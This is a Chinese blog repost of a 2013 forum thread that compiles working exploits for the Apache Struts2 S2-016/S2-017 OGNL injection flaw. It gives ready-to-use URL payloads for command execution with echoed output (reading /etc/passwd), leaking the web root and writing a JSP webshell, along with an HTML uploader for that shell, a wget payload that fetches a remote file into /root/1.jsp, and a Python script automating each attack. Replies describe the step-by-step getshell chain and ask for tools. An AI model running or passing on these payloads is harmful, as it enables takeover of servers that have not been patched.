Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell e...

最新推荐文章于 2024-05-29 16:38:35 发布
最新推荐文章于 2024-05-29 16:38:35 发布
阅读量456 收藏
点赞数
文章标签: java shell python
原文链接:https://my.oschina.net/chinahermit/blog/145349
版权

大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。

喜欢就点一下感谢吧^_^

带回显命令执行: 

http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

爆路径: 

http://www.example.com/struts2-blank/example/X.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

写文件: 

http://www.example.com/struts2-blank/example/X.action?redirect:${  %23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'), %23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"), new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close() }&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e

写入的文件内容: 

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

其实就是一个jsp的小马,需要客户端配合

函数f是文件名,t是内容

客户端: 

<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post"> <textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br> <input type=submit value="提交"> </form>

就在当前目录建立一个fjp.jsp

shell:http://www.example.com/struts2-blank/example/fjp.jsp

还有@园长的一个客户端: 

<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <title>jsp-园长</title> </head> <style> .main{width:980px;height:600px;margin:0 auto;} .url{width:300px;} .fn{width:60px;} .content{width:80%;height:60%;} </style> <script> function upload(){ var url = document.getElementById('url').value, content = document.getElementById('content').value, fileName = document.getElementById('fn').value, form = document.getElementById('fm'); if(url.length == 0){ alert("Url not allowd empty!"); return ; } if(content.length == 0){ alert("Content not allowd empty!"); return ; } if(fileName.length == 0){ alert("FileName not allowd empty!"); return ; } form.action = url; form.submit(); } </script> <body> <div class="main"> <form id="fm" method="post"> URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>&nbsp;&nbsp;
     FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />&nbsp;&nbsp; <a href="javascript:upload();">Upload</a><br/> <textarea id="content" class="content" name="t" ></textarea> </form> </div> </body> </html>

还有@X发的一个wget的getshell 

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'} )).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}

[原文地址]

相关讨论:

1#

DragonEgg | 2013-07-17 22:45

大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。

2#

Jewer (苦逼的人生。) | 2013-07-17 22:46

- -好吧!!我顶一下0 0

3#

Ivan | 2013-07-17 22:46

这个屌……

4#

DragonEgg | 2013-07-17 22:47

还有@X发的一个getshell 

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'} )).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}

5#

kissy | 2013-07-17 22:47

非常的感谢 楼主 求 工具啊

6#

修码的马修 | 2013-07-17 22:49

这……累趴多少黑阔

7#

kissy | 2013-07-17 22:50

这么先进的信息在什么地方 拿到的?

8#

rootsecurity | 2013-07-17 22:51

牛逼

9#

墨水心_Len | 2013-07-17 22:56

今天就是IT界的一个悲剧!

10#

Icyblade | 2013-07-17 23:06

Getshell的基本思路是先爆路径,然后通过路径上传小马(就是上传大马的马,url不能过长所以只能先传小马),然后用小马传大马。这里有点扯的是 http://a.com/b/c/d.action传上去的小马有可能在http://a.com/b/里面也有可能在http://a.com/b /c/里面,晚上写工具的时候一直在纠结这个问题,求大神拯救

11#

小胖胖要减肥 | 2013-07-17 23:14

@rootsecurity 京东的菊花

12#

kissy | 2013-07-17 23:14

@Icyblade 大神 你的工具是 用什么语言写的? 可以说说如何写工具吗?

13#

LauRen | 2013-07-17 23:16

求合成工具

14#

天朝城管 | 2013-07-17 23:43

一帮白帽子在wooyun上刷struts2,一帮黑帽子在地下脱裤。裤漏了,黑帽子溜了。白帽子被判刑x年,出来后感叹WQNMLGB

15#感谢(1)

DragonEgg | 2013-07-17 23:47

= =!点 感谢 啊。。

16#

LauRen | 2013-07-17 23:49

@DragonEgg 感谢以点

17#

isaac | 2013-07-17 23:53 

# coding: utf-8 import string import random import urllib # 简单 POC bait = "".join(random.sample(list(string.letters), 32)) """
%{
#bait=new java.lang.String('test_str'),
#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),
#resp.println(#bait),
#resp.flush(),
#resp.close()
}
""" simple_poc = "%{" simple_poc += "#bait=new java.lang.String('{0}'),".format(bait) simple_poc += "#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter()," simple_poc += "#resp.println(#bait)," simple_poc += "#resp.flush()," simple_poc += "#resp.close()" simple_poc += "}" # 获取网站物理路径 """
%{
#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
#webroot=#req.getSession().getServletContext().getRealPath('/'),
#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),
#resp.println(#webroot),
#resp.flush(),
#resp.close()
}
""" webroot_exp = "%{" webroot_exp += "#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')," webroot_exp += "#webroot=#req.getSession().getServletContext().getRealPath('/')," webroot_exp += "#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter()," webroot_exp += "#resp.println(#webroot)," webroot_exp += "#resp.flush()," webroot_exp += "#resp.close()" webroot_exp += "}" # 执行命令 """
%{
#ps=(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start().getInputStream(),
#buf=new char[50000],
new java.io.BufferedReader(new java.io.InputStreamReader(#ps)).read(#buf),
#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),
#resp.println(#buf),
#resp.flush(),
#resp.close()
}
""" execute_exp = "%%{" execute_exp += "#ps=(new java.lang.ProcessBuilder(new java.lang.String[]{%s})).start().getInputStream()," execute_exp += "#buf=new char[50000]," execute_exp += "new java.io.BufferedReader(new java.io.InputStreamReader(#ps)).read(#buf)," execute_exp += "#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter()," execute_exp += "#resp.println(#buf)," execute_exp += "#resp.flush()," execute_exp += "#resp.close()" execute_exp += "}" # 写webshell """
%{
#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
#sio=new java.lang.StringBuffer(),
#sio.append(#req.getRealPath(%s)),
#response=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),
#response.println(#sio),
#response.close(),
#fos=new java.io.FileOutputStream(#sio),
#fos.write(#req.getParameter('%s').getBytes()),
#fos.close()}
""" getshell_exp = "%%{" getshell_exp += "#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')," getshell_exp += "#sio=new java.lang.StringBuffer()," getshell_exp += "#sio.append(#req.getRealPath('%s'))," getshell_exp += "#response=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter()," getshell_exp += "#response.println(#sio)," getshell_exp += "#response.close()," getshell_exp += "#fos=new java.io.FileOutputStream(#sio)," getshell_exp += "#fos.write(#req.getParameter('%s').getBytes())," getshell_exp += "#fos.close()}" def test_simple_poc(url): for prefix in ["action:", "redirect:", "redirectAction:"]: if bait in urllib.urlopen("{0}?{1}{2}".format(url, prefix, urllib.quote(simple_poc))).read(): return True return False def test_webroot_exp(url): for prefix in ["action:", "redirect:", "redirectAction:"]: resp = urllib.urlopen("{0}?{1}{2}".format(url, prefix, urllib.quote(webroot_exp))).read().lower() if not resp.startswith("<html>") and not resp.endswith("</html>"): return resp def test_execute_exp(url): for prefix in ["action:", "redirect:", "redirectAction:"]: resp = urllib.urlopen("{0}?{1}{2}".format(url, prefix, urllib.quote(execute_exp % "'ifconfig'"))).read().lower() if not resp.startswith("<html>") and not resp.endswith("</html>"): return resp def test_getshell_exp(url): for prefix in ["action:", "redirect:", "redirectAction:"]: resp = urllib.urlopen("{0}?{1}{2}".format(url, prefix, urllib.quote(getshell_exp % ("shell.txt", "c"))), data="c=bazinga").read().lower() if not resp.startswith("<html>") and not resp.endswith("</html>"): return resp

18#

锄禾哥 ("%</a>&) | 2013-07-18 01:31

看到楼上的python 我都忍不住出来冒泡了。。。。好人一生平安。thank打码。

19#

dave | 2013-07-18 01:40

哈哈。。谢谢 提示 可以自己写工具了

20#

hack雪花 | 2013-07-18 02:03

@dave 求写的发245452134@qq.com

21#

dave | 2013-07-18 02:25

@hack雪花 已经有现成的工具啦。我只不过当学习。这世界已经有轮子啦。哈哈

22#

HK骚年 | 2013-07-18 04:54

求具体详细利用思路。主要是写马那块的。QQ:498532059

23#

火星人 (不会技术活) | 2013-07-18 08:51

@小胖胖要减肥 截图完去啊

24#

无聊哥 | 2013-07-18 09:03

@天朝城管 不错的说法

本文“Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理”,来自:Nuclear'Atk 网络安全研究中心,本文地址:http://lcx.cc/?i=3733,转载请注明作者及出处!

转载于:https://my.oschina.net/chinahermit/blog/145349

chuancuili8770
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
批量getshell教程+工具
07-28
批量getshell教程+工具
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
struts2中取得web项目的根目录
光华小丸子
10-30 4932
struts2中取得web项目的根目录
阿一网络安全实战——利用Struts2搭建socks5隧道进内网
最新发布
Ayixy的博客
05-29 395
运行客户端以后,我们的服务端就可以看到已经建立完成了。运行(这个运行因为要加载配置文件,所以后面要加。在代理规则里面将我们需要代理的软件添加进去。同级目录下(之前传其他地方都运行不了)然后还是同样的先要赋予程序可执行权限。代理工具新建一个代理,设置为刚刚。对应的文件如下,接下来开始部署。路径,我们在该路径下上传一个。这两个文件赋予可执行权限。配置文件的具体内容如下。,并且该台机器可以出网。只扫出来开放了两个端口。用冰蝎上传至一开始上传。配置文件具体内容如下。然后运行的时候也要加载。
struts2修复GetShell漏洞
既是过河之卒,惟有奋力向前。
06-14 589
struts2.1.8.1升级至2.3.28步骤: Apache Struts 2是世界上最流行的Java Web服务器框架之一。然而不幸的是,有安全研究员在Struts 2上发现了一枚远程代码执行漏洞。 目前Apache官方已发布公告,该漏洞危险级别为高危。 正好手上有个项目的Struts版本较低,存在该漏洞,于是记录下来: JAR包修改: – 新增jar包  javassist...
渗透测试-struts2攻防环境搭建拿shell
lza20001103的博客
04-14 2001
渗透测试之struts2攻防环境搭建
K8_Struts2_EXP S2-045.rar
02-22
Struts2漏洞检测工具 Struts2漏洞测试工具 K8 struts2 exploit Test Struts2 GetShell 目前已支持以下struts2漏洞编号 (S2-032 s2-020 s2-019 s2-016 s2-013 s2-009 S2-005) 声明:工具仅供安全检测或网络攻防研究,...
K8_Struts2_EXP.zip
09-27
]10 S2-045 CVE-2017-5638 支持GetShell/获取物理路径/执行CMD命令 [+]9 devMode CVE-xxxx-xxxx 支持GetShell/获取物理路径/执行CMD命令 [+]8 S2-037 CVE-2016-4438 支持GetShell/获取物理路径/执行CMD命令 [+]7 ...
K8Struts2Exploit(S2
11-10
解压密码:k8team[+]S2-020CVE-2014-0094支持GetShell(这洞特殊,EXP集成在飞刀)[+]S2-019CVE-2013-4316支持GetShell/获取物理路径/执行CMD命令[+]S2-016CVE-2013-2251支持GetShell/获取物理路径/执行CMD命令[+]S2-...
Struts2漏洞利用工具-可用于检测
08-01
Struts2的一个著名漏洞是CVE-2017-5638,也被称为“S2-045”或“Struts GET Shell”。这是一个远程代码执行漏洞,攻击者可以通过精心构造的HTTP请求头触发漏洞,执行任意服务器端代码。此漏洞影响了大量使用Struts2...
Struts2 S2-016/S2-017 命令执行带回、看web路径getshell exp整理
收集盒 Book box
07-31 2449
以下是Struts2 S2-016/S2-017漏洞 命令执行整理 带回命令执行 http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),
AttackWebFrameworkTools:傻瓜式导入URL即可实现批量测试,能一键getshell检测绝不sql注入或不是只检测。其中thinkphp集成所有rce Exp Struts2集成了shack2和k8漏洞利用工具所有Exp他们他们的exp进行优化和修复此工具的所集成的整体漏洞是基于平时实战中所得到的经验从而写入到工具里。例如:通达oA一键getshell实战测试struts2一键getshell等等
02-16
AttackWebFrameworkTools 1.0 2021-02-15 ReadTeam的AttackWebFrameworkTools 更新状态日志: 2021-02-15新增activemq exp / poc 2021-02-14更新solr exp / poc结果增加了cve编号和断裂名称 2021-02-12更新solr 4个exp / poc动图测试效果见本页底部 2021-02-08更新solr CVE-2019-17558一个CVE 2021-02-05更新Dlink 2021-02-01更新apachedruid ....... 工具编写背景: 编写目的:测试已经公开突破 背景在公司内部有些早已经公开的扩展struts2 thinkphp weblogic这些需要批量测试用网上的工具有C#写的有python java写的用这些工具都得装一下依赖库。pyth
最新手工拿服务器Shell教程+工具猫魔盒+struts2漏洞利用工具+OBlogGetshell 0day
10-02
最新手工拿服务器Shell教程+工具猫魔盒+struts2漏洞利用工具+OBlogGetshell 0day
S2-016漏洞利用工具
05-03
对S2-016的检测和利用
Struts2漏洞利用工具(最新版)
07-27
Struts2漏洞利用工具(最新版)
Struts2漏洞利用工具2017版V1.8
03-09
2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html 2017-03-07: 增加安恒信息研究员nike.zheng发现的S2-045,jakatar处理复杂数据类型时,异常处理不当,导致OGNL代码执行,通过在请求的Content-Type头中构造OGNL表达式来执行Java代码。http://struts.apache.org/docs/s2-045.html 2016-04-26: 增加最新的S2-032远程代码执行漏洞,和S2-019很相似。 参考:http://seclab.dbappsecurity.com.cn/?p=924 2015-12-01: 采用scanner读数据流,再也不用担心s16不能执行net user/ipconfig/netstat -an等命令了。 增加复杂数据包(multipart/form-data)提交方式进行漏洞利用,可绕过部分防护。可执行命令,暂时无法上传文件。 2014-11-12: 最近遇到s19这个debug模式开启导致代码执行,这个有点少,但还是有一些,为了方便大家把13版本修改了一下。可以利用这个漏洞执行命令、上传shell。
Struts2 S2-016/S2-017 命令执行带回、写入文件,看web路径getshell exp整理
weixin_34082177的博客
12-02 418
带回命令执行: http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23...
linux struts2漏洞,Struts2再爆远程代码执行漏洞(S2-016)
weixin_30702441的博客
05-16 236
Struts又爆远程代码执行漏洞了!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。描述影响版本 Struts 2.0.0 - Struts 2.3.15报告者 Takeshi Terada of Mitsui Bussan Secure Dir...
php strus2 漏洞攻击_Struts2 S2-16漏洞利用工具
weixin_36427956的博客
01-12 169
昨天Struts漏洞大爆发,N多大站被爆出存在strtus2漏洞,百度,百合,京东等也在其中,本站也等一时间发布了strtus2漏洞的预警,具体文章请看struts2最新s2-016代码执行漏洞 – CVE-2013-2251,当时小弟说了稍候公布利用EXP,现在就兑现承诺。首先发一个GUI版的,是K8拉登哥哥写的,可以利用较老的struts2漏洞,如下图: 个人感觉拉登哥的用起来不是很方便,自己...
struts s2-20/21
09-02
Struts2是一种基于Java EE的开源Web应用程序框架,用于构建J2EE应用程序。S2-020和S2-021是Struts2框架中的两个安全漏洞。 S2-020漏洞是由于在处理**参数拦截器(ParameterInterceptor)**时存在安全问题而引起的。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值